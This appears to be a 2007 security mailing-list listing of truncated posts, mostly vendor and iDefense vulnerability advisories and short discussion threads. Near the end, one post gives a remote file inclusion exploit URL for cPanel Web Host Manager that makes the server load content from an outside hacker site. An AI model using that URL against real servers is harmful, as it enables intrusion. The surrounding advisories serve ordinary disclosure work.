On Mon, 29 Jan 2007, Simple Nomad wrote:
On Mon, 2007-01-29 at 13:00 -0600, Gadi Evron wrote:
How can we all automate the testing process for fake vulns in and
list
them as such without overburdening OSVDB, CVE, Milworm and SecuriTeam?
How about letting them get posted to bugtraq as ppl
===
Ubuntu Security Notice USN-417-2 February 06, 2007
postgresql-8.1 regression
https://launchpad.net/bugs/83505
===
A security issue affects the following Ubuntu releases:
The FreeProxy HTTP proxy server suffers from a denial of service condition
which causes the server to hang. This occurs when an attacker makes a
request for the hostname/portnumber combination in use by the server itself.
The vendor was notified on the 10th January 2007 and a fix was made
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandriva Linux Security Advisory MDKSA-2007:035
http://www.mandriva.com/security/
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandriva Linux Security Advisory MDKSA-2007:036
http://www.mandriva.com/security/
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandriva Linux Security Advisory MDKSA-2007:037
http://www.mandriva.com/security/
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandriva Linux Security Advisory MDKSA-2007:038
http://www.mandriva.com/security/
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 1258-1[EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
February 7th, 2007
rPath Security Advisory: 2007-0026-1
Published: 2007-02-07
Products: rPath Linux 1
Rating: Minor
Exposure Level Classification:
Local Deterministic Denial of Service
Updated Versions:
samba=/[EMAIL PROTECTED]:devel//1/3.0.24-0.1-1
samba-swat=/[EMAIL PROTECTED]:devel//1/3.0.24-0.1-1
$
$
$ Title : XLNC1 Radio Classical Music Nuke Portal Remote File Inc. Vuln.
$ Author: Gokhan
$ Site : http://www.xlnc1.org/nuke
$ Contact : [EMAIL PROTECTED] | [EMAIL PROTECTED]
$
$ Vuln
I'm somewhat surprised that the reporter does not list the HTML template editor
as a potential XSS attack vector too. Perhaps he considers uploading files via
FTP to be a means of attack too?
Yes, we allow *authenticated administrators* to enter HTML for certain values.
This is the intended
Amit Klein wrote:
Chris Anley wrote:
Hi folks,
I've posted a paper that explains a little more here:
http://www.ngssoftware.com/research/papers/Randomness.pdf
Nice paper. I do notice an enumeration loop over 2^16 possible 16-bit
values. This can be improved as following (note: this is
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandriva Linux Security Advisory MDKSA-2007:039
http://www.mandriva.com/security/
RARLabs Unrar Password Prompt Buffer Overflow Vulnerability
iDefense Security Advisory 02.07.07
http://labs.idefense.com/intelligence/vulnerabilities/
Feb 07, 2007
I. BACKGROUND
Unrar is a command line archive extractor for Windows and Linux. For more
information visit the vendor's site at the
Trend Micro TmComm Local Privilege Escalation Vulnerability
iDefense Security Advisory 02.07.07
http://labs.idefense.com/intelligence/vulnerabilities/
Feb 07, 2007
I. BACKGROUND
The Trend Micro AntiVirus scan engine is widely relied upon to provide
AntiVirus capabilities to desktop, server, and
Trend Micro AntiVirus UPX Parsing Kernel Buffer Overflow Vulnerability
iDefense Security Advisory 02.07.07
http://labs.idefense.com/intelligence/vulnerabilities/
Feb 07, 2007
I. BACKGROUND
The Trend Micro AntiVirus scan engine provides anti-virus capabilities to
desktop, server and gateway
name : web host manager
vendor : cpanel.net
by : s3rv3r_hack3r (ali [at] hackerz [dot] ir)
web-site : www.hackerz.ir - ali.hackerz.ir
exploit:
http://domain.com:2086/scripts2/objcache?obj=http://www.hackerz.ir/?
On Thursday 01 February 2007 01:52, Andreas Beck wrote:
No, but it can be easily defeated by changing the placement/appearance
of the number(s) as well as that of the noise or by keeping both
constant over reloads.
What is exploited here, is the fact that noise and payload behave
differently
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandriva Linux Security Advisory MDKSA-2007:040
http://www.mandriva.com/security/
19 matches
Mail list logo